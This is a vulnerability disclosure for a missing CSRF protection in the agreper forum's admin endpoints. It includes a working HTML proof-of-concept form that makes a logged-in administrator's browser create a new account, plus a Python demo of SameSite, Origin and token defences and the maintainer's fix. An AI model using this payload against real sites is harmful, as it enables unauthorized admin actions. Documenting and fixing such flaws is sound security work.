Anti-CSRF mechanism is not present in demindiro/agreper

Valid

Reported on

Jan 24th 2023


Description

The application is vulnerable to Cross-Site Request Forgery (CSRF). State-changing admin endpoints such as POST /admin/user/new/ accept form submissions without any anti-CSRF token, and nothing stops the browser from attaching the victim's session cookie to a request that originates from an attacker-controlled page. Any page the logged-in administrator visits can therefore submit a form to the application and have it executed with admin privileges.

Proof of Concept

  1. Login as admin.
  2. Open the following HTML file in the browser. This action is equivalent to clicking a link sent by an attacker.

trap.html

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8000/admin/user/new/" method="POST">
      <input type="hidden" name="name" value="csrf" />
      <input type="hidden" name="password" value="password" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
  3. Click the button (or have the page submit the form automatically via script).
  4. A new user named csrf with password "password" is created in the admin's session, without the admin having intended it.

Impact

An attacker who lures a logged-in administrator onto a page they control (or who injects the form above into a page the administrator visits) can make the administrator's browser perform admin actions, such as:

  • Creating a new user, giving the attacker a persistent account
  • Changing a user's role, for example promoting the attacker's account to admin
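The following is an added stand-alone example, not agreper's code, showing in plain Python (stdlib only, 3.8+) why trap.html succeeds against an unprotected handler and what the two usual defences look like: the SameSite cookie attribute the maintainer later adopted, and a synchronizer token plus Origin check on the server. SECRET_KEY, SITE_ORIGIN, the ADMIN_SESSIONS store, the attacker origin http://attacker.example and the simplified browser model in browser_sends_cookie are all assumptions made for the demo; in particular a real browser sends Origin "null" for a form submitted from a file:// page, which the hardened handler treats the same as a missing Origin.

```python
"""CSRF defence demo: SameSite cookie, Origin check, synchronizer token.
Hypothetical stand-alone code written for this write-up, not agreper's own."""
import hashlib
import hmac
import secrets
from http.cookies import SimpleCookie
from urllib.parse import urlsplit

SECRET_KEY = b"constructed-demo-key-use-a-random-one"  # assumption: app secret
SITE_ORIGIN = "http://localhost:8000"                  # origin used in the PoC
ADMIN_SESSIONS = {}  # session id -> username; stands in for the session store


def login_admin(username="admin"):
    """Create an admin session and return its id (hypothetical store)."""
    sid = secrets.token_urlsafe(32)
    ADMIN_SESSIONS[sid] = username
    return sid


def csrf_token_for(session_id):
    """Synchronizer token bound to the session. A cross-site page can neither
    read nor forge it, so it must be echoed back in the form body."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def session_cookie_header(session_id, samesite="Lax"):
    """Set-Cookie header for the session. samesite=None reproduces the unfixed
    behaviour (no attribute); 'Lax' is the fix from the maintainer's comment."""
    c = SimpleCookie()
    c["session"] = session_id
    c["session"]["httponly"] = True
    c["session"]["path"] = "/"
    if samesite:
        c["session"]["samesite"] = samesite
    return c.output(header="Set-Cookie:")


def browser_sends_cookie(samesite, method, cross_site):
    """Simplified model (constructed) of the SameSite rule a browser applies:
    Lax withholds the cookie on cross-site POSTs like trap.html but still sends
    it on top-level cross-site GET navigations, so Lax alone does not protect
    state-changing GET endpoints."""
    if not cross_site:
        return True
    if samesite is None or samesite.lower() == "none":
        return True
    if samesite.lower() == "strict":
        return False
    return method.upper() == "GET"  # Lax


def handle_user_new(request, hardened=True):
    """POST /admin/user/new/ handler. request = {'method', 'headers', 'form'}.
    hardened=False behaves like the report describes: any POST carrying an
    admin session cookie creates the user."""
    if request["method"] != "POST":
        return 405, "method not allowed"
    cookies = SimpleCookie(request["headers"].get("Cookie", ""))
    sid = cookies["session"].value if "session" in cookies else None
    if sid not in ADMIN_SESSIONS:
        return 403, "admin login required"
    if hardened:
        # Check 1: Origin (Referer as fallback) must be our own site.
        origin = request["headers"].get("Origin") or request["headers"].get("Referer")
        if not origin or origin == "null":
            return 403, "missing Origin"
        o = urlsplit(origin)
        if f"{o.scheme}://{o.netloc}" != SITE_ORIGIN:
            return 403, "cross-site request"
        # Check 2: synchronizer token in the form body, constant-time compare.
        token = request["form"].get("csrf_token", "")
        if not hmac.compare_digest(token, csrf_token_for(sid)):
            return 403, "bad CSRF token"
    name = request["form"].get("name")
    if not name:
        return 400, "name required"
    return 200, f"user {name} created"


def simulate_trap_html(session_id, samesite=None, hardened=False):
    """Replay trap.html: a cross-site POST from the attacker's page while the
    victim holds an admin session cookie carrying the given SameSite value."""
    headers = {"Origin": "http://attacker.example"}  # constructed attacker origin
    if browser_sends_cookie(samesite, "POST", cross_site=True):
        headers["Cookie"] = f"session={session_id}"
    req = {"method": "POST", "headers": headers,
           "form": {"name": "csrf", "password": "password"}}
    return handle_user_new(req, hardened=hardened)


if __name__ == "__main__":
    sid = login_admin()
    print(session_cookie_header(sid))
    print("unfixed:      ", simulate_trap_html(sid))
    print("SameSite=Lax: ", simulate_trap_html(sid, samesite="Lax"))
    print("token+Origin: ", simulate_trap_html(sid, hardened=True))
```

Run as a script it prints the Set-Cookie line and then 200 for the unfixed case, 403 once the cookie is Lax, and 403 once the handler checks Origin and the token. The two defences are complementary: SameSite=Lax stops the browser from attaching the cookie to cross-site POSTs at all, while the token and Origin checks also cover browsers that ignore SameSite, same-site attackers on a sibling subdomain, and any state change reachable by GET.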

David Hoppenbrouwers validated this vulnerability 2 months ago

Apparently Flask doesn't set SameSite by default. Adding app.config['SESSION_COOKIE_SAMESITE'] = 'Lax' resolves this issue.

Thanks!

bAu has been awarded the disclosure bounty
David Hoppenbrouwers marked this as fixed in 0.1.1b with commit 09f56b 2 months ago
This vulnerability will not receive a CVE
David Hoppenbrouwers published this vulnerability 2 months ago